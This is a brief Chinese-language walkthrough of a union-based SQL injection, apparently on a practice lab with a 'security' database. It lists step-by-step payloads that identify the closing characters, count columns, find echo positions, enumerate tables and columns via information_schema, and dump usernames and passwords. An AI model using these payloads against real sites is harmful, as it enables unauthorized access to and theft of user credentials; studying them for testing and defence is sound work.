0、初始页面

1、确定闭合字符

确定为字符型注入

?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为   ‘)

?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+